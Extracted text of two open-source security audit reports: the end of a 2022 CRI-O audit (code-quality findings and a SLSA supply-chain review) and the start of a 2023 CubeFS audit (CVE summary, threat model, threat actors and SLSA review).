been written for this container, and ignores bytes written after the limit is\nreached. CRI-O has been patched to check for this capability in conmon, and sets the limit to\n16MB automatically if conmon supports it.\n18\nCRI-O security audit, 2022\nIssue 3: Low: Use of deprecated library io/ioutil\nSeverity\nLow\nDifficulty\nHigh\nTarget\nMany places in code base\nFinding ID\nADA-CRIO-22-03\nFound by\nManual auditing\nThe library io/ioutil is used throughout the codebase. This library is deprecated since go1.16\nhttps://go.dev/doc/go1.16#ioutil\nThe deprecation was not due to security issues and as such it does not pose any immediate\nrisk. However, the use of deprecated libraries is discouraged and can lead to situations\nwhere security issues in a library are found but never patched.\nIssue 1 is due to the use of a dangerous function,ReadFile\n, in this library.\n19\nCRI-O security audit, 2022\nIssue 4: Low: Timeouts in container creation routines due to device\nspecifications\nSeverity\nLow\nDifficulty\nHigh\nTargetinternal/factory/container/device.go\nFinding ID\nADA-CRIO-22-04\nFound by\nFuzzing\nThe following issue:\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=47159\nis a\ntimeout inSpecAddDevices\ntriggered by the\ncontainer_fuzzer.go\nfuzzer. The issue is\ntriggered by a call to\nSpecAddDevices\nfunction call\nand the issue happens because the\nconfiguration ends up having set a number of devices in the container config that will each\ntrigger\nthis line\nwith path set to “/”. In this case\nthis means there will be several directory\nwalks of the entire file system, and this causes the timeout.\nfor_, device :=rangec.Config().Devices {// pin the device to avoid using `device` withinthe range scope as......// if the device is not a device node// try to see if it's a directory holding many devicesiferr == devices.ErrNotADevice {// check if it is a directoryife := utils.IsDirectory(path); e ==nil{// mount the internal devices recursively// nolint: errcheckfilepath.Walk(path,func(dpathstring, f os.FileInfo,e error)error{// filepath.Walk failed, skipife !=nil{returnnil\nThe issue happens when a specific config is set by way ofcontainer.SetConfig\n.\nThis function is, however, set in theCreateContainer\nentrypoint of the server here\nhttps://github.com/cri-o/cri-o/blob/c17baa0dd7701bfd9bed58cb24aef39c1c125cc0/server/co\nntainer_create.go#L289\nand the requests have not been\nsanitised before callingSetConfig\n.\nRecommendation:\nIn general, we advise to have guards in place for this. Performance is of significance in\nCRI-O. Further discussion with the CRI-O team should be done.\n20\nCRI-O security audit, 2022\nIssue 5: Low: Unhandled errors from deferred file close operations\nSeverity\nLow\nDifficulty\nHigh\nTarget\nThroughout the code\nFinding ID\nADA-CRIO-22-05\nFound by\nManual auditing\nThroughout the codebase there are places where file close operations are deferred within a\nfunction where a file is being written to, e.g.\nhttps://github.com/cri-o/cri-o/blob/149cccaad772158d5908376aad3ee86e4e1ca4cf/internal/o\nci/runtime_oci.go#L1152\nhttps://github.com/cri-o/cri-o/blob/2aae9632876b0df4fba49e4229d7239a168a097c/cmd/crio/\nmain.go#L201\nThis can lead to undefined behaviour since any errors returned by thef.Close()\noperation\nare ignored. This can have consequences in the event a close operation fails and the data\nhas not yet been flushed to the file, which the rest of the code will assume it to be. For a\ndetailed discussion on this, please see\nhttps://www.joeshaw.org/dont-defer-close-on-writable-files/\nRecommendation\nEnsure that errors fromf.Close()\nare handled.\n21\nCRI-O security audit, 2022\nIssue 6: Informational: Missing nil-pointer checks in json unmarshalling\nSeverity\nInformational\nDifficulty\nHigh\nTargetinternal/oci/runtime_oci.go\nFinding ID\nADA-CRIO-22-06\nFound by\nManual auditing\nThere are several places in the code base where JSON decoding happens with a double\npointer as argument. There are scenarios where the JSON decoding will cause the double\npointer argument to be a nil-pointer and there are currently no checks in the code for this\ncase.\nAn example of this is in internal/oci/runtime_oci.go:\n// regardless of what is in waitErr// we should attempt to decode the output of the parent pipe// this allows us to catch TimedOutMessage, which will cause waitErr tonot be nilvarec *exitCodeInfodecodeErr := json.NewDecoder(parentPipe).Decode(&ec)\n…\n…NB: Called when there is no error in decoding:\nifec.ExitCode ==-1{returnnil, &ExecSyncError{Stdout: stdoutBuf,Stderr: stderrBuf,ExitCode:-1,Err: errors.New(ec.Message),}}\nThere are cases wheredecodeErr\nisnil\nandec\nends\nup also beingnil\n. This would cause\na nil-pointer dereference inec.ExitCode\n. The specific\nevent occurs when the output ofparentPipe\nequals “null”. Although we were not able\nto trigger this case, this exact coding\npattern has previously caused high-severity security vulnerabilities elsewhere:\nhttps://github.com/istio/istio/security/advisories/GHSA-856q-xv3c-7f2f\nRecommendation:\nCheck forec\nbeing a nil pointer before dereferencing\nit or avoid using a nil-pointer\ndereference.\n22\nCRI-O security audit, 2022\nSoftware Supply Chain Security Audit CRI-O\nIn collaboration with Open Source Technology \nImprovement Fund, Cloud Native Computing \nFoundation, and Ada Logics.\n23\nCRI-O security audit, 2022\nVersion\nAuthor\nNotes\n0.0.1\nAdolfo García V eytia\nInitial Draft\n24\nCRI-O security audit, 2022\nTable Of Contents\nEngagement Overview\n2\n5\nChainguard Company Overview\n2\n5\nExecutive Summary\n2\n5\nSoftware Supply Chain Security Background\n2\n5\nGoals\n2\n7\nInterviews & Engagement Model\n2\n7\nFindings\n2\n7\nBuild\n2\n7\nSource Code\n2\n7\nDeploy\n28\nMaterial Verification\n28\nSLSA Overview\n28\nSLSA Findings\n28\nSLSA Assessment Table\n28\nRecommendations and Remediations\n3\n1\nDocument the Release Process, Draft Policy\n3\n1\nSystem Generated Provenance and SBOM\n3\n2\nPush towards SLSA compliance, all the way to Level 3\n3\n2\nAutomate Package Builds\n3\n3\nSources\n3\n4\n25\nCRI-O security audit, 2022\nEngagement Overview\nAs part of the Cloud Native Computing Foundation (CNCF) and Linux Foundation’s\ncommitment to industry best practices, a third-party security review of CRI-O was funded.\nOpen Source Technology Improvement Fund, Inc (OSTIF) facilitated the review and sourced\nAdaLogics and Chainguard. AdaLogics performed threat modeling, OSS Fuzz integration,\nand manual code review; while Chainguard performed a supply chain review. The following\nreport is the Supply Chain Review.\nChainguard Company Overview\nChainguard is the world's premiere software supply chain leader. Our mission is to make the\nsoftware supply chain secure by default. Our teams feature the brightest minds in the\nindustry with cross-cutting experience across containers, cloud computing, security, and all\nthings software supply chain. We have a strong commitment to building and scaling secure\nopen source technologies for the world.\nExecutive Summary\nThe release process that generates CRI-O’s public and testing artifacts has its core\nfunctionality automated end to end, enabling the project to shield it from threats induced by\nhuman omission and compromised operator’s systems. The GitHub Actions powered\nrelease process sets the project in a position to start making its outputs non-falsifiable and to\npush towards SLSA compliance, setting a roadmap to an increasingly hardened process.\nBefore pursuing SLSA compliance, automating system package generation should be\nprioritized. Running those builds in an automated environment should be the first priority of\nthe CRI-O team. Minor recommendations around documentation can be done in parallel to\nensure advancing towards SLSA compliant systems is done from a fully documented\nplatform.\nThe project is close to SLSA level 1 compliance. Adding provenance metadata to the build\nruns would cover most of the missing points, readying the project to start signing artifacts\nand attestations.\nSoftware Supply Chain Security Background\nThe software development lifecycle has become increasingly complex, and one way for\nsoftware companies to deal with that complexity is to rely more and more on Open Source\nSoftware development. This reliance has opened an attack vector for hackers to infiltrate\norganizations and steal crucial business and valuable customer data. In 2020 there has\nbeen a 430% growth in next-generation cyber-attacks actively targeting open-source\nsoftware projects\n1\n—open Source software in components\nin an organization's Software\nSupply Chain. Organizations' build systems, those software components that build software,\nare also under attack. 2020 saw the first prolific supply chain security attack, Sunburst. This\nattack compromised the Solarwinds build system to inject malicious code into their IT\n26\nCRI-O security audit, 2022\nmonitoring system, distributed to customers unbeknownst to Solarwinds. There are many\nentry points in the software supply chain of an organization, and any good defensive strategy\nrequires diligence, multilevel security, and observability of the entirety of the Software supply\nchain.\nSoftware Supply chains and the processes involved can be divided into three categories:\nDevelopment, Build, Run. Development is the process of adding new features, functionality,\ntesting and bug fixes. Before running software, it must be validated and packaged in the\nbuild category. And finally running the software so it is available to end users.\nThese categories can be further divided into links:\n●\nDevelopment - Act of writing software\n●\nSource - Artifact that was directly authored or reviewed by persons\n●\nBuild - Set of process that transform for consumption\n●\nPackage - Source that is published for use\n●\nDependencies - Artifact that is an input to a build process but that is not a source\n●\nDeploy - Set of steps to make Artifact consumable for end users\n●\nRun - Artifacts are available to be consumed by end users\nSoftware developers face threats at each link in the software supply chain. Source threats\nare those that inject software, features, and functionality not intended by the software\nproducer. Build threats are those that involve manipulating the source during build time, such\nas Sunburst attacks. The final category is Dependency threats, Attacker adds a dependency\nand then later changes the dependency to add malicious behavior.\n27\nCRI-O security audit, 2022\nGoals\nA deliverable from Chainguard that represents their findings and perspective about the\ncurrent release process including a prioritized list of gaps that they believe should be\naddressed in the short term, this document. The document will serve as an appendix to the\noverall audit report, therefore, the codebase itself and the running environment is out of\nscope of this assessment.\nInterviews & Engagement Model\nReview of the release tooling was conducted by inspecting the open-source GitHub\nrepository. A final Q&A session was held on slack on May 9th, 2022\nFindings\nBuild\nThe CRI-O build system runs at every commit, producing the same bundles for arm64 and\nam64 architectures containing config files, plugins, binaries and other files that tagged\nreleases publish.\nMost of CRI-O build system run in GitHub actions, with a fairly high degree of automation,\nespecially given the number of active contributors to the project. The release process of the\nstatic binaries performs all critical steps under automation, while the last non-critical bits\n(patching the release notes, for example) are still manual. Building the system packages is\nstill a manual process which is more of a concern, but given the overall automation level of\nthe project, automating the build of these artifacts should be easily achievable.\nBase builds are reproducible, yet some artifacts like os packages are signed which\nintroduces entropy, leading to varying output.\nBuild automation is kept in GitHub Actions workflows and scripts. Hence, the infrastructure\nthat runs the build automation is not managed by the project itself. The Actions environment\nprovides isolation from run to run\nStep to step metadata is not signed, nor are artifacts built by the release process provided\nfor download. Prebuilt OS Packages are signed for their respective packaging system.\nSource Code\nThe project’s source code is tracked in git and revision history is kept indefinitely in GitHub.\nThe project has a contributions guide. The guide establishes roles and a two-reviewer\nrequirement for all merges. Signed commits are required to contribute to the project.\n28\nCRI-O security audit, 2022\nDeploy\nSigned build metadata is not provided. User validation of artifacts is limited to integrity check\nvia checksum files.\nMaterial Verification\nReleases are not described with a Software Bill of Materials, no provenance attestations\nrecording the release process steps are produced either. The project uses FOSSA to keep\ntrack of dependencies and licensing.\nSLSA Overview\nSLSA is a set of standards and technical controls you can adopt to improve artifact integrity\nand build towards completely resilient systems. It’s not a single tool, but a step-by-step\noutline to prevent artifacts from being tampered with and tampered artifacts from being used,\nand at the higher levels, hardening up the platforms that make up a supply chain.\n4\nSLSA Findings\nDerived from the findings detailed below, CRI-O is near SLSA Level 1 compliance.\nProducing the necessary provenance metadata would set the release process ready to start\nimplementing digital singatures of its artifacts and metadata, ensuring they can’t be\ntampered with,\nSLSA Assessment Table\nSource Requirements\n1\n2\n3\n4\nStatus/Justification\nVersion controlled\nEvery change to the source is tracked in a\nversion control system that meets the\nfollowing requirements\nO\n✓\n✓\n✓\nVerified history\nEvery change in the revision’s history has at\nleast one strongly authenticated actor\nidentity (author, uploader, reviewer, etc.) and\ntimestamp.\n✓\n✓\nRetained indefinitely\nThe revision and its change history are\npreserved indefinitely and cannot be deleted,\nexcept when subject to an established and\ntransparent policy for obliteration, such as a\nlegal or policy requirement.\n1\n8\nm\no\n✓\nGit tree remains unaltered. Source code\nof the build is archived\nTwo-person reviewed\nEvery change in the revision’s history was\nagreed to by two trusted persons prior to\nsubmission, and both of these trusted\npersons were strongly authenticated.\n(Exceptions from Verified History apply here\nas well.)\n✓\n2 person requirement specified in docs\n29\nCRI-O security audit, 2022\nBuild requirements\n1\n2\n3\n4\nScripted build\nAll build steps were fully defined in some sort\nof “build script”. The only manual command,\nif any, was to invoke the build script.\nStatic builds are automated but building\nsystem packages is still a “semi manual”\nprocess\nBuild service\nAll build steps ran using some build service,\nnot on a developer’s workstation.\nStatic builds are automated but building\nsystem packages is still a “semi manual”\nprocess\nBuild as code\nThe build definition and configuration is\ndefined in source control and is executed by\nthe build service.\n✓\n✓\nYes, workflows executed in GitHub\nActions\nEphemeral\nenvironment\nThe build service ensured that the build\nsteps ran in an ephemeral environment,\nsuch as a container or VM, provisioned\nsolely for this build, and not reused from a\nprior build.\n✓\n✓\nBuild environment is created/destroyed by\nGitHub Actions\nIsolated\nThe build service ensured that the build\nsteps ran in an isolated environment free of\ninfluence from other build instances, whether\nprior or concurrent.\n✓\n✓\nBuild process cannot clash with other\nprocesses\nParameterless\nThe build output cannot be affected by user\nparameters other than the build entry point\nand the top-level source location. In other\nwords, the build is fully defined through the\nbuild script and nothing else.\n✓\nHermetic\nAll transitive build steps, sources, and\ndependencies were fully declared up front\nwith immutable references, and the build\nsteps ran with no network access.\n✓\nReproducible\nRe-running the build steps with identical\ninput artifacts results in bit-for-bit identical\noutput. Builds that cannot meet this MUST\nprovide a justification why the build cannot\nbe made reproducible.\nO\nYes, for static builds. Signed system\npackages cannot be reproducible\nProvenance\n1\n2\n3\n4\nAvailable\nThe provenance is available to the consumer\nin a format that the consumer accepts. The\nformat SHOULD be in-toto SLSA\nProvenance, but another format MAY be\nused if both producer and consumer agree\nand it meets all the other requirements.\n✓\n✓\n✓\n✓\nNo provenance info exists yet\nAuthenticated\nThe provenance’s authenticity and integrity\ncan be verified by the consumer. This\nSHOULD be through a digital signature from\na private key accessible only to the service\ngenerating the provenance.\n✓\n✓\n✓\nService generated\nThe data in the provenance MUST be\nobtained from the build service (either\n✓\n✓\n✓\n30\nCRI-O security audit, 2022\nbecause the generator is the build service or\nbecause the provenance generator reads\nthe data directly from the build service).\nNon-falsifiable\nProvenance cannot be falsified by the build\nservice’s users.\n✓\n✓\nDependencies\ncomplete\nProvenance records all build dependencies\nthat were available while running the build\nsteps.\n✓\nContents of\nProvenance\n1\n2\n3\n4\nIdentifies artifact\nThe provenance MUST identify the output\nartifact via at least one cryptographic hash.\nNo provenance data exists yet\nIdentifies builder\nThe provenance identifies the entity that\nperformed the build and generated the\nprovenance. This represents the entity that\nthe consumer must trust.\nIdentifies build\ninstructions\nThe provenance identifies the top-level\ninstructions used to execute the build. The\nidentified instructions SHOULD be at the\nhighest level available to the build\nIdentifies source code\nThe provenance identifies the repository\norigin(s) for the source code used in the\nbuild.\nIdentifies entry point\nThe provenance identifies the “entry point” of\nthe build definition (see build-as-code) used\nto drive the build including what source repo\nthe configuration was read from.\n✓\n✓\nIncludes all build\nparameters\nThe provenance includes all build\nparameters under a user’s control. See\nParameterless for details. (At L3, the\nparameters must be listed; at L4, they must\nbe empty.)\n✓\n✓\nIncludes all transitive\ndependencies\nThe provenance includes all transitive\ndependencies listed in Dependencies\nComplete.\nIncludes reproducible\ninfo\nThe provenance includes a boolean\nindicating whether build is intended to be\nreproducible and, if so, all information\nnecessary to reproduce the build. See\nReproducible for more details.\nIncludes metadata\nThe provenance includes metadata to aid\ndebugging and investigations. This SHOULD\nat least include start and end timestamps\nand a permalink to debug logs.\nO\nO\nO\nO\nCommon\nrequirements\n1\n2\n3\n4\n31\nCRI-O security audit, 2022\nSecurity\nThe system meets some TBD baseline\nsecurity standard to prevent compromise.\n(Patching, vulnerability scanning, user\nisolation, transport security, secure boot,\nmachine identity, etc. Perhaps NIST 800-53\nor a subset thereof.)\n✓\nNeeds separate assessment. shared\nresponsibility model inherits some\ncompliance but our operation needs to be\nevaluated.\nAccess\nAll physical and remote access must be rare,\nlogged, and gated behind multi-party\napproval.\n✓\nNo remote access (GH Actions based)\nSuperusers\nOnly a small number of platform admins may\noverride the guarantees listed here. Doing so\nMUST require approval of a second platform\nadmin.\n✓\nRecommendations and Remediations\nThe CRI-O release process has a good degree of automation and is free of legacy platforms\nand code, setting the project in a good position to build features to harden builds and\nartifacts. SLSA compliance is within reach\nDocument the Release Process, Draft Policy\nDesignation\nSSCOBSERVE\nRisk\nLack of documentation and policies into the \nrelease process may result in time and \neffort to remediate incident reports and \nultimately code.\nRecommendation\n●\nCreate documentation of the release \nprocess \n●\nDraft vulnerability policy delineating \nacceptable risk levels \n●\nDraft 3rd party components policy, \ndetailing acceptable dependencies, \nlicensing, etc\nWhere - Development, Build, Run\nAll\nPrioritisation\nP3\n32\nCRI-O security audit, 2022\nSystem Generated Provenance and SBOM\nDesignation\nARTINT\nRisk\nResponding to 3rd party vulnerabilities or \nbuild system compromises could result in \nunnecessary burden and slow response \ntime because of lacking inventory and \ninformation about the CI runs. Scanning the \ncode for vulnerabilities in dependencies and \nattaching the results as signed attestations \ncan provide assurances to users and may \nblock releases containing vulnerabilities.\nRecommendation\nAttach provenance data to artifacts:\nWe recommend that the minimum \nprovenance data to have: \n●\nSBOM \n●\nSLSA Provenance attestation \n●\nVulnerability scan reports\nProvenance data can be generated at build \ntime, but not necessarily all at the same \ntime. For example, SBOM can be \ngenerated at build time, and at a later time \nvulnerability analysis may be attached.\nWe also recommend that provenance data \nbe signed to comply with SLSA 3 \n(non-falsifiable). Project\nSigstore\noffers \nfacilities to sign/attach-and-sign/verify \nprovenance data.\nPush towards SLSA compliance, all the way to Level 3\nDesignation\nSLSA\nRisk\nThe level of automation of the project’s \nbuild systems puts it in a good position to \nstart implementing SLSA compliance..\nRecommendation \n●\nGithub Actions has proven to run \nSLSA 3 Workloads \n●\nNon falsifiable SLSA provenance \nusing GitHub workflows \n●\nAchieving SLSA 3+ on GitHub: \nReusable Workflows and OIDC\n33\nCRI-O security audit, 2022\n●\nKubernetes workloads to run \nephemeral Github actions\nWhere - Development, Build, Run\nBuild\nPrioritisation\nP3\nAutomate Package Builds\nDesignation\nOSSPM\nRisk\nCRI-O releases system packages for Linux \ndistributions but these artifacts are not built \nby the automation. An attacker could \ncompromise systems where these \npackages are built. Securing the package \nbuilds in an automated system should be \npriority one\nRecommendation\n●\nReview Sigstore integrations with\nPackage maintainers.\nLots of\ndetails, more targeted at repository\noperators\n●\nReview the\nopenssf wg survey\nwhich has a lot of practices for\npackage maintainers\n●\nBecome involved in the OpenSSF\nWorking Group to help drive and\nunderstand the current security\navailable to package maintainers\n●\nImplement and/or continue a review\nprocess for access controls around\npackage managers\nWhere - Development, Build, Run\nBuild\nPrioritisation\nP0\n34\nCRI-O security audit, 2022\nSources\n1.\nSonatype 2020 State of Software Supply Chain\nhttps://www.sonatype.com/resources/white-paper-state-of-the-software-supply-chain- \n2020 \n2.\nInside a Targeted Point-of-Sale Data Breach \nhttps://krebsonsecurity.com/wp-content/uploads/2014/01/Inside-a-Targeted-Point-of- \nSale-Data-Breach.pdf \n3.\n10 real-world stories of how we’ve compromised CI/CD pipelines \nhttps://research.nccgroup.com/2022/01/13/10-real-world-stories-of-how-weve-compr \nomised-ci-cd-pipelines/ \n4.\nSLSA Supply Chain Threats\nhttps://slsa.dev/spec/v0.1/#supply-chain-threats \n5.\nWhat an SBOM Can Do for You \n6.\nExecutive Order on Improving the Nation’s Cybersecurity \n7.\nNIST Secure Software Development Framework (SSDF) [PDF]\n35\n" } ]
{ "category": "Runtime", "file_name": "CubeFS-security-audit-2023-report.pdf", "project_name": "CubeFS", "subcategory": "Cloud Native Storage" }
[ { "data": "CubeFS Security\nAudit\nIn collaboration with the CubeFS project maintainers, The Linux Foundation and the\nOpen Source Technology Improvement Fund\nPrepared by\nAdam Korczynski, Ada Logics\nDavid Korczynski, Ada Logics\nReport version: 1.0\nPublished: 2nd January 2024\nThis r\neport is licensed under Creative Commons 4.0 (CC BY 4.0)\nThis page has intentionally been le\u0000 blank\nCubeFS 2023 Security Audit\n2\nAda Logics LtdTable of Contents\nExecutive summary 4\nProject scope 6\nThreat model 7\nSLSA review 11\nIssues found 12\nCubeFS 2023 Security Audit\n3\nAda Logics LtdExecutive summary\nIn the fall of 2023, Ada Logics conducted a security audit of CubeFS in a coordinated\ncollaboration between Ada Logics, CubeFS, OSTIF and the CNCF. The CNCF funded the work.\nThe security audit was a holistic security audit with the following goals:\n1. Assess and formalize a threat model for CubeFS highlighting entrypoints, risks and at-risk\ncomponents.\n2. Review the CubeFS codebase for security vulnerabilities of any severity.\n3. Review CubeFS's supply-chain maturity against SLSA.\nTo formalize the threat model, Ada Logics relied on three sources of information: 1) CubeFS'so\u0000icial documentation, 2) the CubeFS source tree and 3) feedback from the CubeFS\nmaintainers. The manual review was performed against the threat model to allow the auditors\nto consider trust levels and threat actors as they were reviewing the code.\nThe report contains all issues found from both the threat modelling and manual code audit\nexercises. Five of these issues were exploitable by threat actors identified during the threat\nmodelling, and these issues were assigned the following CVE's:\nIssue CVECVE\nseveritiy\nAuthenticated users can crash the CubeFS servers with\nmaliciously cra\u0000 ed requestsCVE-2023-\n46738Moderate\nTiming attack can leak user passwordsCVE-2023-\n46739Moderate\nInsecure random string generator used for sensitive dataCVE-2023-\n46740Moderate\nCubeFS leaks magic secret key when starting Blobstore access\nserviceCVE-2023-\n46741Moderate\nCubeFS leaks users key in logsCVE-2023-\n46742Moderate\nAda Logics disclosed these findings responsibly to CubeFS through CubeFS's public Github\nSecurity Advisory disclosure channels. The CubeFS security response team responded to the\ndisclosures with fixes in a timely manner and before the audit had been completed.\nThe SLSA review found that CubeFS scores low because it does not include provenance for\nreleases. Ada Logics included practical steps for achieving SLSA Level 3 compliance.\nCubeFS 2023 Security Audit\n4\nAda Logics LtdStrategic recommendations\nIn this section, we include our strategic recommendations for CubeFS to maintain a secure\nproject moving forward. Several points in this section are reflected in \"Found Issues\" or other\nparts of the report, whereas some are only included here.\nSupply-Chain Security\nCubeFS has undoubtedly included supply-chain security in its ongoing work. For example,CubeFS has adopted Scorecard, which considers several di\u0000 erent aspects of supply-chain\nsecurity risks in an automated manner. Nonetheless, Supply-chain Security is an area where\nCubeFS can improve its ongoing work. The audit found that releases are not signed and do not\ninclude provenance, which makes consumers vulnerable to known supply-chain risks. We have\nincluded practical steps to take to add this to releases. While CubeFS has integrated the\nScorecard Github Action, CubeFS currently scores a 6,5 Scorecard score, which leaves room forimprovement. Open and closed-sourced so\u0000ware ecosystems are seeing an increase in supply-\nchain attacks and their sophistication, with major recent attacks having had their first\ncompromise in the so\u0000ware development lifecycle rather than a\u0000 er deployment.\nStatic analysis\nCubeFS uses automated SAST in its development pipeline however limited to only CodeQL for\nsecurity tooling. During the audit, Ada Logics tested CubeFS with other SAST tools, which found\ntrue positives in the CubeFS code base. We recommend adding the GoSec and Semgrep tools as\nwellm and add ignore directives for false positives.\nSecurity-relevant documentation\nCubeFS has good documentation but lacks a dedicated security-best-practices section to help\nusers deploy a security-hardened CubeFS instance. We recommend adding and maintaining\nthis to ensure users can consume CubeFS in a secure manner and avoid security issues arising\nfrom misconfiguration.\nDuring the security audit, the CubeFS team added a security-best-practices section to theo\u0000icial CubeFS documentation which is available here:\nhttps://cubefs.io/docs/master/maintenance/security_practice.html\nCubeFS 2023 Security Audit\n5\nAda Logics LtdProject Scope\nThe following Ada Logics auditors carried out the audit and prepared the report.\nName Title Email\nAdam Korczynski Security Engineer, Ada Logics Adam@adalogics.com\nDavid Korczynski Security Researcher, Ada Logics David@adalogics.com\nThe following CubeFS team members were part of the audit.\nName Title Email\nLeon Chang maintainer changliang@oppo.com\nXiaochun He maintainer hexiaochun@oppo.com\nBaijiaruo maintainer huyao2@oppo.com\nLei Zhang maintainer zhanglei12@oppo.com\nThe following OSTIF members were part of the audit.\nName Title Email\nDerek Zimmer Executive Director, OSTIF Derek@ostif.org\nAmir Montazery Managing Director, OSTIF Amir@ostif.org\nHelen Woeste Project coordinator, OSTIF Helen@ostif.org\nCubeFS 2023 Security Audit\n6\nAda Logics LtdThreat model\nIn this part, we look at CubeFS's threat model. We have used open-source materials to\nformalize the threat model including mainly from documentation produced by the CubeFS\necosystem, recorded talks, presentations and third-party documentation.\nCubeFS is a cloud-native data storage infrastructure o\u0000 en used on top of databases, machine-\nlearning platforms and applications deployed on top of Kubernetes. It supports multiple access\nprotocols like S3, POSIX and HDFS with flexibility for consumers using multiple protocols in the\nsame deployment.\nCubeFS has four main components: 1) A metadata subsystem, 2) a data subsystem, 3) a\nresource management node also called \"Master\" and 4) an Object Subsystem. Below, we\nenumerate the components.Metadata subsystem\nThe Metadata subsystem runs the MetaNode which stores all file metadata in the cluster. In\nKubernetes, this is deployed as a DaemonSet K8s resource.\nData subsystem\nThe data subsystem is known internally in CubeFS as DataNode and handles the actual storing of\nfile data. It mounts a large amount of disk space to store file data. When using CubeFS with\nKubernetes, DataNode is deployed as a DaemonSet .\nResource management\nThe resource management component is called Master and is responsible for managing\nresources and maintaining the metadata of the whole cluster. When deploying CubeFS on\nKubernetes, the Master Node is deployed as a StatefulSet K8s resource.\nObject Subsystem\nThis component runs ObjectNodes and acts as an interface between di\u0000 erent protocols - HDFS,\nPOSIX and S3 - such that CubeFS works as the underlying data store, and the user can operate\nCubeFS by way of either or several of these protocols. The Object Subsystem is also called the\nObject Gateway internally in the CubeFS ecosystem.\nIn addition to the four core components, CubeFS implements an AuthNode which handles\nauthentication and authorization in a CubeFS deployment.\nCubeFS is meant to be deployed in such a manner that it is available to users of varying\npermission levels. This means that at a high level, CubeFS must be resistant to malicious cluster\nusers who have been granted access. For example, if an organization grants access to an\nemployee who gets convinced by a competitor to steal or corrupt data, the CubeFS devops\nteam must know the impact this employee has for risk mitigation and impact remediation\npurposes. User permissions in CubeFS should start at the lowest and increase with the\npermissions that CubeFS admins intend to add to the user.\nThere are at least two security-relevant implications for CubeFS's architectural and permission\ndesign:\nCubeFS 2023 Security Audit\n7\nAda Logics Ltd1. Users should not be able to achieve permissions they have not been granted. A permission\nshould not imply another permission, whether intended or not. At this level, we are\nconsidering defined permissions that are not assigned to a user. This part of CubeFS's\nsecurity model distinguishes between privileges at a granular level.\n2. The second implication is the distinction between root and non-root permissions. CubeFS\nshould accept a full cluster deletion by the cluster admin; it is not a security breach if the\ncluster admin or CubeFS admin can take down the entire cluster or cause any other harm\nto any part of CubeFS. There is an implied list of non-permitted actions that users shouldnot be allowed to perform. These are general security risks that pertain to other so\u0000ware\napplications, such as Denial-of-Service attacks, stealing data, remote code execution,\ncorruption of data and other general threats.\nMost commonly, CubeFS is not exposed directly to the internet but will be available to services\ninside the cluster to which it is deployed. A CubeFS deployment will have multiple client nodes\nthat include a client container, which is intended to communicate with the remaining CubeFS\ncomponents. Communication between components happens via HTTP(S); Each component\nexposes a web server to the cluster. As such, threats are likely to come from users who already\nhave a position in the cluster. This position can be through a legitimate use cage - a user that\nshould have access and has been granted so by the CubeFS admin, or it could be through a\nthreat actor who has already escalated privileges and who seeks to further advance their\nposition inside the cluster. In the former scenario, we have covered the expectations above,\nwhich we can sum up as such: If a legitimate user turns malicious, the CubeFS admin should\nknow what their impact is and should be in control of reducing any permissions that the user\nhas. In other words, what the CubeFS admin expects the user can do represents the user's\nprivileges pricisely. For the latter, CubeFS should reduce the ease with which an attacker can\nfurther escalate privileges inside the cluster.\nCubeFS 2023 Security Audit\n8\nAda Logics LtdTrust boundaries\nIn this section, we identify the trust boundaries of a CubeFS deployment. Below, we include a\ntrust-flow diagram of an out-of-the-box CubeFS deployment:\nTypically, a CubeFS deployment will be deployed alongside an internet-facing application in the\ncluster with which users communicate. When tra\u0000ic enters the cluster, it crosses a trust\nboundary and flows low to high in the direction from the internet to the cluster. This trust\nboundary could also exist between the user-facing application and the CubeFS client nodes,\ndepending on the specific use case. The reason for this is that the user-facing application coulddo its own validation and sanitization. From the user-facing application, tra\u0000ic flows to the\nCubeFS client nodes. These authenticate the request before processing it, and the tra\u0000ic\ncrosses another trust boundary when being authenticated. At this point, trust flows low to high\nin the direction from the CubeFS client nodes to the authenticator. Trust remains high until\nCubeFS responds to the user external to the cluster.\nCubeFS 2023 Security Audit\n9\nAda Logics LtdThreat actors\nA threat actor is an individual or group that intentionally attempts to exploit vulnerabilities,\ndeploy malicious code, or compromise or disrupt a CubeFS deployment, o\u0000 en for financial\ngain, espionage, or sabotage. A threat actor is the personification of a possible attacker of\nsecurity issues. Each threat actor has a level of trust tied to them, and matching one or several\nthreat actors with CubeFS's threat model helps identify the high-level security risk. We identify\nthe following threat actors for CubeFS. A threat actor can assume multiple profiles from the\ntable below; for example, a fully untrusted user can also be a contributor to a 3rd-party library\nused by CubeFS.Threat Actor DescriptionLevel\nof trust\nCode contributor to\nCubeFSPerson or group of people that contribute code to\nCubeFS's upstream repositoryNone\nCode contributor to\nCubeFS's 3rd-party\ndependenciesPerson or group of people that contribute code to\nCubeFS's 3rd-party dependenciesNone\nExternal users of ingress\ncluster entrypointsUsers that interact with internet-facing applications in the\ncluster. The purpose of these entrypoints will for the most\npart be to enable use of CubeFS.None\nOutside actor with\nposition in clusterA person or group of people with no granted privileges\nthat have escalated privileges by using a weakness in\nCubeFS, its underlying platform or a 3rd-party\ndependency.None\nCluster userCluster users with non-root privileges. These are users of\nthe CubeFS deployment.Low to\nhigh\nInfrastructure\ncontributorsThese are users that maintain applications and\ninfrastructure running on the cluster. This threat actor is\nnot a user of CubeFS themselves, but they facilitate access\nfor other users.Low\nCluster admin Users with sudo permissions over the cluster and CubeFS. Full\nCubeFS 2023 Security Audit\n10\nAda Logics LtdSLSA review\nADA Logics carried out a SLSA review of CubeFS. SLSA ( https://github.com/slsa.dev) is a\nframework for assessing the security practices of a given so\u0000ware project with a focus on\nmitigating supply-chain risk. SLSA emphasises tamper resistance of artifacts as well as\nephemerality of the build and release cycle.\nSLSA mitigates a series of attack vectors in the so\u0000ware development life cycle (SDLC), all of\nwhich have seen real-world examples of successful attacks against open-source and proprietary\nso\u0000ware.\nBelow, we include a diagram made by the SLSA illustrating the attack surface of the SDLC.\nEach of the red markers demonstrate di\u0000 erent areas of possible compromise that could allow\nattackers to tamper with the artifact that the consumer invokes at the end of the SDLC.\nSLSA splits its assessment criteria into 4 increasingly demanding levels. The higher the level of\ncompliance, the higher tamper-resistance the project ensures its consumers.\nAn essential part of ensuring tamper resistance is to include a verifiable provenance statement\nwith releases. SLSA provides a framework for creating this automatically when building release\nartifacts (https://github.com/slsa-framework/slsa-github-generator) which we recommend\nCubeFS adopts. Building artifacts by way of the slsa-github-generator will produce SLSA level 3\ncompliant provenance. CubeFS can adopt the slsa-github-generator by adding a Github\nworkflow that invokes the SLSA builder.\nComplying with SLSA level 3 reflects a high standard of supply-chain mitigation, and 